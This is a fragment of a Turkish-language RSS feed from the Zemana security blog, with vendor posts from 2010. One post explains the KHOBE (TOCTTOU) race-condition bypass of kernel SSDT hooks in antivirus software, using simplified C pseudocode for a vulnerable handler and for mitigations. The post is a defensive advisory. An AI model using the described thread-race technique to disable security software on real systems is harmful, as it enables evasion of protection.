href="http://malwareresearchgroup.com/wp-content/uploads/2009/01/MRG-Online-Banking-Browser-Security-Project2.pdf"&gt;MRG&lt;/a&gt; (Malware Research Group), güvenlik yazılımlarını test etmek için gerçek bir malware yazdı. Simülasyonların aksine, bu zararlı tamamen gizli çalışıyor ve infecte ettiği sistemlerde &lt;a href="http://www.hsbc.co.uk/"&gt;HSBC&lt;/a&gt; online bankacılık şifrelerini toplayıp uzak bir merkeze gönderiyor. "AntiLogger, sadece simulasyon programları için optimize edilmiş" gibi cümlelerle bizi eleştirenlere de, aşşağıdaki tablonun güzel bir yanıt olacağını düşünüyoruz. &lt;br /&gt;
&lt;br /&gt;
Raporun tamamına ulaşmak için &lt;a href="http://malwareresearchgroup.com/wp-content/uploads/2009/01/MRG-Online-Banking-Browser-Security-Project2.pdf"&gt;tıklayınız&lt;/a&gt;. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://malwareresearchgroup.com/wp-content/uploads/2009/01/MRG-Online-Banking-Browser-Security-Project2.pdf" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" height="640" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S_z589s7EwI/AAAAAAAAAQs/Iiw31teVWXA/s640/MRG-Online-Banking-Browser-Security-Project.png" width="406" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-4371677377515898108?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/TPQkFaKv-cs/antilogger-banker-trojana-kars.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_W_bgBWwE23o/S_z589s7EwI/AAAAAAAAAQs/Iiw31teVWXA/s72-c/MRG-Online-Banking-Browser-Security-Project.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://blog.zemana.com/2010/05/antilogger-banker-trojana-kars.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-986722095655956695</guid><pubDate>Wed, 26 May 2010 10:02:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.112+03:00</atom:updated><title>Zemana AntiLogger ranked #1 on TopTenREVIEWS</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://anti-keylogger-software-review.toptenreviews.com/" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" height="424" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S_zzAwbPzaI/AAAAAAAAAQc/v78H6d2YgOc/s640/zemana+on+toptenreviews.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Amerika'nın en önde gelen yazılım inceleme kuruluşu &lt;a href="http://www.toptenreviews.com/"&gt;TopTenREVIEWS&lt;/a&gt;, Zemana AntiLogger'i kendi katogorisinde 1 numara seçti. İnceleme yazısına &lt;a href="http://anti-keylogger-software-review.toptenreviews.com/zemana-antilogger-review.html"&gt;buradan&lt;/a&gt;, karşılatırmaya ise&amp;nbsp;&lt;a href="http://anti-keylogger-software-review.toptenreviews.com/"&gt;buradan&lt;/a&gt; bakabilirsiniz. &lt;br /&gt;
&lt;br /&gt;
Türkler'e karşı önyargılı olmadıkları ve&amp;nbsp;bu denli güzel aksyionları için kendilerine sonsuz teşekkürler.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://anti-keylogger-software-review.toptenreviews.com/zemana-antilogger-review.html" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" height="140" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S_zzEmWh5AI/AAAAAAAAAQk/qIbcUy9oCoo/s640/Zemana+award.png" width="640" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-986722095655956695?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/MwPTkJ1uTYE/zemana-antilogger-ranked-1-on.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_W_bgBWwE23o/S_zzAwbPzaI/AAAAAAAAAQc/v78H6d2YgOc/s72-c/zemana+on+toptenreviews.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://blog.zemana.com/2010/05/zemana-antilogger-ranked-1-on.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-8086328604237056616</guid><pubDate>Wed, 26 May 2010 09:26:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.117+03:00</atom:updated><title>Zemana Anti-Sound Recorder Technology</title><description>&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S_zpU41g6iI/AAAAAAAAAP0/z3umDhCizFo/s1600/Zemana+Anti-Sound+Recorder+Technology.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S_zpU41g6iI/AAAAAAAAAP0/z3umDhCizFo/s320/Zemana+Anti-Sound+Recorder+Technology.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;Alanımızdaki rakiplerimizin artış göstermesi ve bu teknolojiyi kullanmaları bizide harekete geçirdi ve AntiLogger 21 mayıs &lt;a href="http://www.zemana.com/whatsnew.aspx"&gt;güncellemesinde&lt;/a&gt;, microfonların uzaktan dinlenmesini engelleyecek sistemi, programımıza dahil ettik. &lt;/div&gt;&lt;br /&gt;
&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;a href="http://www.sabah.com.tr/Yazarlar/ovur/2010/05/09/chpde_kaset_suikast_ve_komplo_ucgeni"&gt;Sayın Baykal'a yapılan kaset komplosuna&lt;/a&gt; benzer salrırıların, bilgisayarlar ile hacker'lar tarafından rahatça yapılabileceğini düşünürsek, AntiLogger, &lt;strong&gt;sezgisel&lt;/strong&gt; Anti-Webcam ve Anti-Sound recorder modülleri ile bu saldırılara karşı biçilmiş kaftan oluyor. &lt;strong&gt;Sezgisel&lt;/strong&gt; diye üzerine başıyorum çünkü bu denli profesyonel saldırılarda kullanılacak casus yazılımların, Antivirüsler gibi signature-based sistemlere yakalanma ihtimali sıfır.&lt;/div&gt;&lt;div style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="border-bottom: medium none; border-left: medium none; border-right: medium none; border-top: medium none; clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_W_bgBWwE23o/S_zp-uoPNAI/AAAAAAAAAP8/F93RmqfocZE/s1600/sshot-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" height="368" src="http://4.bp.blogspot.com/_W_bgBWwE23o/S_zp-uoPNAI/AAAAAAAAAP8/F93RmqfocZE/s640/sshot-1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-8086328604237056616?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/XJW4z8Qwe-Y/zemana-anti-sound-recorder-technology.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/S_zpU41g6iI/AAAAAAAAAP0/z3umDhCizFo/s72-c/Zemana+Anti-Sound+Recorder+Technology.jpg" height="72" width="72" /><thr:total>7</thr:total><feedburner:origLink>http://blog.zemana.com/2010/05/zemana-anti-sound-recorder-technology.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-2890342193796298922</guid><pubDate>Mon, 24 May 2010 13:10:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.122+03:00</atom:updated><title>KHOBE - 8 şiddetinde deprem</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S_p6RAk9b2I/AAAAAAAAAPs/9Iu5O52c_xc/s1600/Threads.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" gu="true" height="163" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S_p6RAk9b2I/AAAAAAAAAPs/9Iu5O52c_xc/s200/Threads.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Bağımsız test kuruluşu &lt;a href="http://www.matousec.com/info/articles/khobe-8.0-earthquake-for-windows-desktop-security-software.php"&gt;Matousec&lt;/a&gt;, geçen hafta bu başlık ile güvenlik sectörüne çok &lt;a href="http://www.theregister.co.uk/2010/05/07/argument_switch_av_bypass/"&gt;yankı&lt;/a&gt; getirdi. İlgili zafiyet, güvenlik sistemlerinin, kernel hook'larının, multiprocessors işlemcilerde bypass edilmesine olanak veriyor. Bu konu aslında yeni değil ve kesefedende Matousec değil, ancak yaptıkları özel araştırma ve kuvvetli bir başın bülteni ile bu konuyu &lt;b&gt;önemsemeyen&lt;/b&gt; (biz dahil) birçok güvenlik üreticisini harekete geçirdi. Bir kısım işletim sistemini suçladı bir kısım ise konunun karmaşık ve zor olması nedeni ile şimdiye kadar bu zafiyeti kullanan zaralı çıkmadığı ve önlem almayacaklarını belirttiler. Matousec'ın, üreticiler ile iletişime geçmeden bunu internete taşıması ve&amp;nbsp;çözümü paylaşmak için ücret talep etmeside işin tuzu biberi oldu.&lt;br /&gt;
&lt;br /&gt;
Bizde bu açığı kullanan herhangi bir zararlı ile karşılamadık ancak bu durum, bu konun gerçek olmadığını ve özellikle bu bültenden sonra kullanılamayacağı anlamına gelmediği için 21 mayısta yaptığımız güncellemede (&lt;a href="http://www.zemana.com/whatsnew.aspx"&gt;1.9.2.205&lt;/a&gt;) önlemimizi aldık. Bu kadar hızlı önlem almamızda rol oynayan, AntiLogger'ın ckirdeğini geliştiren takımın bulduğu süper kolay çözüm oldu.&lt;br /&gt;
&lt;br /&gt;
KHOBE bir diğer adı ile TOCTTOU (time-of-check-to-time-of-use) zafiyeti nedir?&lt;br /&gt;
&lt;br /&gt;
Kernel SSDT hook çağrılarındaki parametrelerin, çok hızlı bir şekilde başka bi thread tarafından fake edilmesidir. Örneğin ring3'te çalışan bir uygulama, zafiyeti olan bir güvenlik programının kontrol altında tuttuğu bir fonksyona ilk önce zararsız bir parametre gönderip, bu pointerin kontrol edilmesi ile orjinal çağrıya yönlendirilme aşamasında başka bir thread tarafından aynı parametrenin içeriğini zararlı bir değer ile değiştirebilir.&lt;br /&gt;
&lt;br /&gt;
Zafiyet bulunduran bir hook handler'a basit bir örnek verelim: &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NTSTATUS HookedTerminateProcess(PDWORD pdwPid)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;{&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; if( *dwPid == AntivirusPid )&lt;br /&gt;
&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // -&amp;gt; Guvenlik programinin, parametreyi kontrol ettigi satir&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; //self defense&lt;/b&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return STATUS_ACCESS_DENEID;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; else&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // -&amp;gt; Saldirinin gerceklestigi satir&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return OriginalTerminateProcess(pdwPid);&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;}&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Birinci thread, kontrolden geçebilecek bir ProcessId gönderiyor, ve hemen bu kontrolden sonra ikinci thread, ilgili parametreyi güvenlik programının kendi ProcessId'sı ile değiştiriyor ve güvenlik programını kill ediliyor. Mümkün değil! ama nasıl? nezaman? dediğinizi duyar gibiyim :)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;S:&lt;/b&gt; İlgili parametre kernel stack'a push ediliyor, nasıl olurda bunu ring3'ten değiştirebilir?&lt;br /&gt;
&lt;b&gt;C:&lt;/b&gt; Evet pointer kernel stack'ta ve sadece ring0 tarafından değiştirebilir ancak pointerin, point ettiği hafıza alanı&amp;nbsp;hala&amp;nbsp;ring3'te.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;S:&lt;/b&gt;&amp;nbsp;Sadece 2-3 opcode var ve nano saniyeler içinde çalıştırılacak, nasıl olurda tam bu zaman aralağında atak yapılabilir.&lt;br /&gt;
&lt;b&gt;C:&lt;/b&gt; Bu hook handler, sadece basit bir örnek, pratikte bu handler'lar çok karmaşık ve birçok koşul ve döngüden oluşuyor, ve atak için fazlasıyla opcode ve zaman oluşuyor&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;S:&lt;/b&gt; Tek işlemcili sistemlerde kernel Hook handler'da threat context switch gerçekleşmez?&lt;br /&gt;
&lt;b&gt;C:&lt;/b&gt; Hernekadar azda olsa, gerçekleşme ihtimali var çünkü SSDT servisleri adı üstünde (System Service Dispatch Table) IRQL &amp;lt;= DISPATCH_LEVEL seviyesinde çalışıyor ve dokümantasyona göre bu level'de CPU'ya ve başka bir çok değere bağlı olarak thread context switch gerçekleşebiliyor. &lt;br /&gt;
&lt;a href="http://my.safaribooksonline.com/9780735625303/thread_scheduling"&gt;Windows Internals&amp;nbsp; (Thread Scheduling)&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://msdn.microsoft.com/en-us/library/ms810029.aspx"&gt;MSDN (Scheduling, Thread Context, and IRQL)&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;S:&lt;/b&gt; Eğer parametre pointer değilse, örneğin HANDLE&amp;nbsp;ise bu durumda risk varmi?&lt;br /&gt;
&lt;b&gt;C:&lt;/b&gt; Her nekadar kendi denemelerimizde bunu ispatlayamadıysakta, Matousec'a göre teorikte mümkün; İşletim sistemenin HANDLE değerlerini rastgele değilde, belli bir havuzdan oluşturduğunu iddia ediyorlar; bir handle kapatıldıktan hemen sonra, farklı erişim izinleri ile aynı değere sahip başka bir handle tahsis edilebiliyor. Bu durumda zararsız görünen bir handle oluşturuluyor ve kontrola sokuluyor, tam bu sırada ikinci thread bu handle'i kapatıp brute force ile aynı değere sahip yeni bir handle alıyor.&lt;br /&gt;
&lt;br /&gt;
AntiLogger'in çekirdeğini geliştiren takım şefimiz söyle diyor; &lt;i&gt;"Aslında ne yazdığını bilerek kernel kod yazan bir programcı daha önceden hiç KHOBE metodunu duymamış olsa bile doğal olarak bu durumu görüyordur, ancak önlem alınması ve kötüye kullanılması çok zor olduğu için pass geçiyorlar, aynı benimde geçtiğim &lt;/i&gt;&lt;i&gt;gibi"&lt;/i&gt; &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;S:&lt;/b&gt; Peki önlem alınması neden çok zor? Shophos,AVG,CA gibi isimler nasıl olurda hala bir yama yayınlamazlar? Ben çözümü buldum bile?&lt;br /&gt;
&lt;b&gt;C:&lt;/b&gt; İlk etapta akla ilk gelen çözüm ve aynı zamanda en doğru çözüm, ring3'den gelen parametlerin, ring0 da bir kopyasını oluşturmak ve kontrolu + orjinal çağrıyı bu kopya ile yapmak. Bir çoğumuz gibi sizinde aklına bu geldi tahmin ediyorum :) Evet, bu dediğimiz tam bir çözüm ancak gerçek senaryoda 50'den fazla hook handler ve bazılarının 15'ten fazla parametresi bulunuyor ve bu parametreler PDWORD gibi basit pointerler değil, bir çoğu undocumented structor pointerleri ve işletim sisteminden sistemine farklılık gösteriyorlar, bunlar için doğru hafıza alloc etmek geri dönüş değerlerini doğru konumlanmdırmak, hafıza alanlarını temizlemek vs aylarca çalışma ve test gerektiriyor çünkü en ufak bir hatada tüm sistem çökme riski ile karşı karşıya kalabilir. &lt;br /&gt;
&lt;br /&gt;
Bu bahsettiğimiz çözüme örnek verelim:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NTSTATUS HookedTerminateProcess(PDWORD pdwPid)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;{&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; DWORD dwMyPid = *dwPid;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; //dwPid ile isimiz bitti ve tekrar kullanmadigimiz icin bu risk %100 ortadan kalkmis oluyor&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; if( *dwMyPid == AntivirusPid )&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // -&amp;gt; Guvenlik programinin, parametreyi kontrol ettigi satir&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; //self defense&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return STATUS_ACCESS_DENEID;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; else&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // -&amp;gt; Saldirinin gerceklestigi satir&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return OriginalTerminateProcess(dwMyPid);&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;br /&gt;
}&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Eğer bu türde basit hook handler'larımız olsa idi, bu çözüm kesinlikle en iyisi olurdu. Şimdi bizim kullandığımız çözümden bahsedeyim. (Büyük ihtimalle matousec'in çözümüde bu şekildedir diye tahmin ediyoruz)&lt;br /&gt;
&lt;br /&gt;
İlgili hook handler çağrıldığında , çağran thread'in ID'si ile parametreler harmanlanıp bir hash elde ediyoruz ve ilgili kontroller yapıldıktan sonra, orjinal servis çağrılmadan hemen&amp;nbsp;önce bu hash tekrar oluşturup kontrol ediliyor. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NTSTATUS HookedTerminateProcess(PDWORD pdwPid)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;{&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PCHAR szHash = GetHash(pdwPid+PsGetCurrentThreadId());&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ntStatus = STATUS_SUCCESS;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; if( *dwPid == AntivirusPid )&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // -&amp;gt; Guvenlik programinin, parametreyi kontrol ettigi satir&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; //self defense&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return STATUS_ACCESS_DENEID;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; else&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; KeEnterCriticalRegion();&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; // -&amp;gt; Saldirinin gerceklestigi satir&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; if( AdditionalCheck(szHash,pdwPid,PsGetCurrentThreadId()) )&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ntStatus = OriginalTerminateProcess(pdwPid);&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; else&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; {&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; //KHOBE detected&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ntStatus = STATUS_ACCESS_DENEID;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; KeLeaveCriticalRegion();&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; return ntStatus;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; }&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;}&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;S:&lt;/strong&gt; Bu çözüm %100 khobe'i engelliyebilirmi?&lt;br /&gt;
&lt;strong&gt;C:&lt;/strong&gt; Hayir ancak %99 oraninda riski azaltir cunku OS'de toplamda 500'den fazla, kernel de ise yüksek öncelikli 20'den fazla çalismayi bekleyen DPC ve thread var.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;S:&lt;/b&gt; Bu çözümü sizden önce bu kadar büyük ölçekli firmalar neden akıl edemedi?&lt;br /&gt;
&lt;b&gt;C:&lt;/b&gt; Önemli olan nicelik değil, "nitelik" :)&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.sophos.com/blogs/duck/g/2010/05/11/khobe-vulnerability-earth-shaker/"&gt;Shophos - Khobe "vulnerability" – no earth shaker&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.f-secure.com/weblog/archives/00001949.html"&gt;F-Secure - KHOBE Not So High On The Richter Scale&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.eset.com/blog/2010/05/11/khobe-wan-these-arent-the-droids-youre-looking-for"&gt;ESET - Khobe-Wan: These Aren’t the Droids You’re Looking for.&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://blog.gdatasoftware.com/overview/article/1654-khobe-no-problem.html"&gt;GDATA - KHOBE - no problem&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-2890342193796298922?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/nL10YMnZYJs/khobe-8-siddetinde-deprem.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/S_p6RAk9b2I/AAAAAAAAAPs/9Iu5O52c_xc/s72-c/Threads.JPG" height="72" width="72" /><thr:total>8</thr:total><feedburner:origLink>http://blog.zemana.com/2010/05/khobe-8-siddetinde-deprem.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-349738246363464185</guid><pubDate>Wed, 14 Apr 2010 12:46:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.127+03:00</atom:updated><title>AVEA Mobil ödeme ile Zemana AntiLogger</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/S8WrQYjudFI/AAAAAAAAAPk/GGHpQDbT2HE/s1600/avea-mobil-odeme-zemana.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="273" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S8WrQYjudFI/AAAAAAAAAPk/GGHpQDbT2HE/s400/avea-mobil-odeme-zemana.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;Ayrıcalıklı servisler sunmaya devam eden &lt;a href="http://www.avea.com.tr/"&gt;Avea&lt;/a&gt;, "Avea Mobil Ödeme" servisini kullanıma açtı.&lt;br /&gt;
&lt;br /&gt;
